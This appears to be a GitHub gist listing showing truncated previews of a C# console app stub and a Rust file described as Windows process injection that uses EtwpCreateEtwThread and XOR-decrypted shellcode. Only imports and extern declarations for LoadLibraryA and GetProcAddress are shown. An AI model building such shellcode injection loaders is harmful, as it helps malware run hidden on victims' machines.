Nexact
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics.Eventing.Reader; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading; | |
| namespace ConsoleApp2 | |
| { | |
| class Program |
Nexact
/ EtwpCreateEtwThread.rs
Created
October 13, 2020 21:44
Classic Windows process injection written in Rust using EtwpCreateEtwThread & a XOR routine to decrypt shellcode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #![windows_subsystem = "windows"] | |
| extern crate libc; | |
| use std::os::raw::{c_void, c_int}; | |
| use std::{ptr, thread, time}; | |
| #[link(name = "kernel32")] | |
| #[link(name = "user32")] | |
| extern "stdcall" { | |
| pub fn LoadLibraryA(lpFileName: *const u8) -> *const usize; | |
| pub fn GetProcAddress(hModule: *const usize, lpProcName: *const u8) -> *const usize; |